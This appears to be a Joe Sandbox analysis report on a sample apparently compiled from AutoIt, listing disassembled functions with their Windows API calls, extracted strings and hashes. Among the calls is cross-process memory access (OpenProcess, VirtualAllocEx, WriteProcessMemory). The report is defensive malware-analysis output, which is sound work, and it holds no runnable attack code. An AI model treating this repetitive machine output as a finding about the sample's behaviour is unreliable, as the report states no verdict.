Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 823dc02fb38cbfad0b07639c4f9bc44aa6a1cac70d0beb1a427d86983470b4dd
Instruction ID: efed1636de3ea4b27975d501c0372dc5c98bd5d5f0d1b0d02b132f4bc4058829
Opcode Fuzzy Hash: 823dc02fb38cbfad0b07639c4f9bc44aa6a1cac70d0beb1a427d86983470b4dd
Instruction Fuzzy Hash: 07017CB3605204ABDB214F64EC44AAA7BBEEB447A1F1810A8FD44D3220D7B1DD41DBE0

Function 00645244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00645260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0064526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00645276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00645280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006452BC

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 86407ccff7afbde958b3c80b0231c4198ea1f8dfc785fcef1f85c2406ebdc5a8
Instruction ID: 388c6f1e95262c7289ef18a13ce7e530a29a0e229bf86a8a698382ab996cf13b
Opcode Fuzzy Hash: 86407ccff7afbde958b3c80b0231c4198ea1f8dfc785fcef1f85c2406ebdc5a8
Instruction Fuzzy Hash: B0012931D01A1DDBCF00EFE4E8499EEFB7AFB09711F401596E942B2241CBB096508BA5

Function 0063810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00638121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0063812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0063813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00638141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00638157

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 43492354fc98dd7345eaf79d2098bbdf43c9f85e5f3f698831cfc528578f0255
Instruction ID: 8c2f0e19c20d1cb5226f82a3ce5cdfc5501616a0115d8cddfa4497dd2e81750b
Opcode Fuzzy Hash: 43492354fc98dd7345eaf79d2098bbdf43c9f85e5f3f698831cfc528578f0255
Instruction Fuzzy Hash: 32F06271200305AFEB110FA5EC88EE73BAEFF4A754F001025F985C7250CBA19D41DAA0

Function 0063C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0063C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0063C20E
MessageBeep.USER32(00000000), ref: 0063C226
KillTimer.USER32(?,0000040A), ref: 0063C242
EndDialog.USER32(?,00000001), ref: 0063C25C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5a1fd1f0801bdd744b74a5966906d8c05a64ac6abad6a0c2b802e1ef23f1a873
Instruction ID: 2ec2b0a84707b4e3e14f2333ce5263dfcb1f3dfef709adb4456e4e3ca1ec16d0
Opcode Fuzzy Hash: 5a1fd1f0801bdd744b74a5966906d8c05a64ac6abad6a0c2b802e1ef23f1a873
Instruction Fuzzy Hash: 3A01A230404704ABEB209B64ED4EB977BBABB04B06F000269F582E14E0DBE46A548BD0

Function 005E13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 005E13BF
StrokeAndFillPath.GDI32(?,?,0061B888,00000000,?), ref: 005E13DB
SelectObject.GDI32(?,00000000), ref: 005E13EE
DeleteObject.GDI32 ref: 005E1401
StrokePath.GDI32(?), ref: 005E141C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 0e8e44ca34e2dca3a08eaf65fa7ba6eefde19657b181918b85e2451472287fdf
Instruction ID: f50f64489fb34de677795749c64ad08d91c9fc85ef8b643d016f221c8de27f22
Opcode Fuzzy Hash: 0e8e44ca34e2dca3a08eaf65fa7ba6eefde19657b181918b85e2451472287fdf
Instruction Fuzzy Hash: 5FF04F30014B48EBDB15AF26EC4C7583FA6B702326F08A224F46A485F2C7785995DF14

Function 0064C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0064C432
CoCreateInstance.OLE32(00672D6C,00000000,00000001,00672BDC,?), ref: 0064C44A

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

CoUninitialize.OLE32 ref: 0064C6B7

Strings

.lnk, xrefs: 0064C3C6, 0064C3EE, 0064C3F8

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: de6aa5c993a74c9511b2a7e9963e90b9e1d010acd016c8a34406e98f28f14e8d
Instruction ID: da9eac5f9aac24cbe9a3ab92035f9e205ef62093b6c3117db3dcac4624cf2e9b
Opcode Fuzzy Hash: de6aa5c993a74c9511b2a7e9963e90b9e1d010acd016c8a34406e98f28f14e8d
Instruction Fuzzy Hash: 3CA13B71108246AFD704EF55C885EABBBEDFFC9354F00491CF195871A2EB71A909CB92

Function 005F2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00600DB6: std::exception::exception.LIBCMT ref: 00600DEC
Part of subcall function 00600DB6: __CxxThrowException@8.LIBCMT ref: 00600E01

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Part of subcall function 005E7A51: _memmove.LIBCMT ref: 005E7AAB

__swprintf.LIBCMT ref: 005F2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 005F2D66

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 274ac2dbbaef515aca85a5dc388c434fdbdb9e3742dffd61e160619e19f8e8fe
Instruction ID: 60529342b37778a74c2caba907e4a82f9cbdd64fb6a0121b38c8e49fcfb03be9
Opcode Fuzzy Hash: 274ac2dbbaef515aca85a5dc388c434fdbdb9e3742dffd61e160619e19f8e8fe
Instruction Fuzzy Hash: 0C917D711086569FC718EF24D889C7FBBA9FF85310F10491DFA859B2A1EA34ED44CB52

Function 0064B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 005E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E4743,?,?,005E37AE,?), ref: 005E4770

CoInitialize.OLE32(00000000), ref: 0064B9BB
CoCreateInstance.OLE32(00672D6C,00000000,00000001,00672BDC,?), ref: 0064B9D4
CoUninitialize.OLE32 ref: 0064B9F1

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

Strings

.lnk, xrefs: 0064B99D, 0064B9AB

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 70dc5e801300a55bebbc3424a36bcfe475f2708cb5b01b803fa107021b774a61
Instruction ID: c10d56e49f019ba1b8582116d39652dc5f10dbc6f8d6fa99624580ff767928d1
Opcode Fuzzy Hash: 70dc5e801300a55bebbc3424a36bcfe475f2708cb5b01b803fa107021b774a61
Instruction Fuzzy Hash: 3CA168756043469FCB04DF15C884D6ABBE6FF89314F148998F8999B3A2CB31EC46CB91

Function 0063B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0063B4BE

Strings

AutoIt3GUI, xrefs: 0063B436
Container, xrefs: 0063B43B
%g, xrefs: 0063B561

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%g
API String ID: 3565006973-565656749
Opcode ID: 15358758b8cb957f86d57875bc6d10df023cb7ed5dded20aa110309c2d8d9bfc
Instruction ID: aa2e0569637630c4ed07f14543352153c0bc26dd0a9ec5962ab454777ddfbaaa
Opcode Fuzzy Hash: 15358758b8cb957f86d57875bc6d10df023cb7ed5dded20aa110309c2d8d9bfc
Instruction Fuzzy Hash: A8913B70600601EFDB54DF64C884B6ABBEAFF49710F14956DEA4ACB791DB70E841CB90

Function 0060501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006050AD

Part of subcall function 006100F0: __87except.LIBCMT ref: 0061012B

Strings

pow, xrefs: 00605085, 006050A2

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: e626585ce11599a63f832d7ec430bf80d74add43f9e8d0b48dffbec80fc67c7c
Instruction ID: a6a6c368bf15ed8193c39a2b3999affa4f02eec329b74f4f292588c0062fee95
Opcode Fuzzy Hash: e626585ce11599a63f832d7ec430bf80d74add43f9e8d0b48dffbec80fc67c7c
Instruction Fuzzy Hash: 5C515C3194860196EF1A7754CC023EF2BD7DB41700F288D59E4D7863D9EE788DD49E86

Function 00628584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0062862B
_memmove.LIBCMT ref: 00628685

Strings

3c_, xrefs: 0062860C
__, xrefs: 006286FF, 0062DFDC, 0062DFF8

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove
String ID: 3c_$__
API String ID: 4104443479-43384800
Opcode ID: 42b4a4a4a35bd0fcc149f55b5d325497948023fe08573b621a7d9935b3c4f233
Instruction ID: 411f0e9c85f23e49379757552464e1aeaf0b38ef12af996a6be67dc4ddad69a2
Opcode Fuzzy Hash: 42b4a4a4a35bd0fcc149f55b5d325497948023fe08573b621a7d9935b3c4f233
Instruction Fuzzy Hash: 54517B70A01A199FCB64CF68D880AAEBBF2FF44304F148529E95AE7350EB31A955CF51

Function 006397F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006414BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00639296,?,?,00000034,00000800,?,00000034), ref: 006414E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0063983F

Part of subcall function 00641487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006392C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006414B1

Part of subcall function 006413DE: GetWindowThreadProcessId.USER32(?,?), ref: 00641409
Part of subcall function 006413DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0063925A,00000034,?,?,00001004,00000000,00000000), ref: 00641419
Part of subcall function 006413DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0063925A,00000034,?,?,00001004,00000000,00000000), ref: 0064142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006398AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006398F9

Strings

@, xrefs: 00639911

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: dd20588cf684fb69de79ff15309144f9402ff2ae4837f04e1ea7c81428814adf
Instruction ID: aaef264c9ea2e2b5144c4a9efcc7af24ac57f35bb6967f32c04139b8f160fcd9
Opcode Fuzzy Hash: dd20588cf684fb69de79ff15309144f9402ff2ae4837f04e1ea7c81428814adf
Instruction Fuzzy Hash: A241307690011CBFDB10DFA4CC85ADEBBB9EB46300F044159FA55B7191DA716E85CFA0

Function 00667946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0066F910,00000000,?,?,?,?), ref: 006679DF
GetWindowLongW.USER32 ref: 006679FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00667A0C

Strings

SysTreeView32, xrefs: 006679B1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 276d2a0b60730e54de450799683f568a018ead647656bfea27f16caf25c7a5f5
Instruction ID: 5730ad91d64cf36c9238d234e8897fc2b9b75908eb9f2dec792ff4c21c3e8439
Opcode Fuzzy Hash: 276d2a0b60730e54de450799683f568a018ead647656bfea27f16caf25c7a5f5
Instruction Fuzzy Hash: EA31D031204206AFDB119F78DC45BEA7BAAFB49328F245725F875A22E0D730ED518B50

Function 006673D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00667461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00667475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00667499

Strings

SysMonthCal32, xrefs: 0066742C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: a8bf208c0ac1e928d7b9c86aa1f63e8e0791af1981a1418b830bffa2aa7ea191
Instruction ID: 462e44c75142b7fc2133a088e5741d110c6592a09ee248027b8b09e27dccd3fc
Opcode Fuzzy Hash: a8bf208c0ac1e928d7b9c86aa1f63e8e0791af1981a1418b830bffa2aa7ea191
Instruction Fuzzy Hash: 8E21BF32500218BBDF11CF64CC46FEA3BAAEB48724F110214FE15AB190DAB5AC91DBA0

Function 00666CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00666D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00666D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00666D70

Strings

Listbox, xrefs: 00666D08

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 510154e40cba2c3d72083b99f73b6b857d8c4abe44951b3a1c3465033ff0dd7c
Instruction ID: 626b06683ffc7cd8ba57af35eb5abba8025baf4b406d9435508af6a6dd5b3769
Opcode Fuzzy Hash: 510154e40cba2c3d72083b99f73b6b857d8c4abe44951b3a1c3465033ff0dd7c
Instruction Fuzzy Hash: E3219232600118BFDF118F54EC45EEB3BBBEF89750F018128F9459B2A0C671AC518BA0

Function 006539E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00653A66

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 00653A58
, $, xrefs: 00653AA6
%g, xrefs: 006539F4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%g
API String ID: 3506404897-54593619
Opcode ID: a4027c09ee040ff03cb2257bae21d16c0828dde6576b79a74afc7e3fc9d87ecd
Instruction ID: 8f169f03e62019ed6f9de91d98f7a8ec429d49f8b750dc9d23b3a3dbffd5dff6
Opcode Fuzzy Hash: a4027c09ee040ff03cb2257bae21d16c0828dde6576b79a74afc7e3fc9d87ecd
Instruction Fuzzy Hash: 4821A730A0021AAFCF14EF65CC85EAE7BBAFF85740F104454F949A7281DB30EA45CB65

Function 0066770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00667772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00667787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00667794

Strings

msctls_trackbar32, xrefs: 00667749

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: cf863c49a0e91038d84f0ed6167d84f119750ba56f01a1a9031e9a01c72a2b84
Instruction ID: 6034aa78d3122c96ba343e000a36f3d9d599056c56a74b5bf4da11529d04d7df
Opcode Fuzzy Hash: cf863c49a0e91038d84f0ed6167d84f119750ba56f01a1a9031e9a01c72a2b84
Instruction Fuzzy Hash: 89110A72244209BFEF145F65CC05FD77B6EEF89B58F11411CF641A6190D672E851DB20

Function 00606B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00606B93
__calloc_crt.LIBCMT ref: 00606BAC

Strings

@Bj, xrefs: 00606BC3
i, xrefs: 00606BD1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
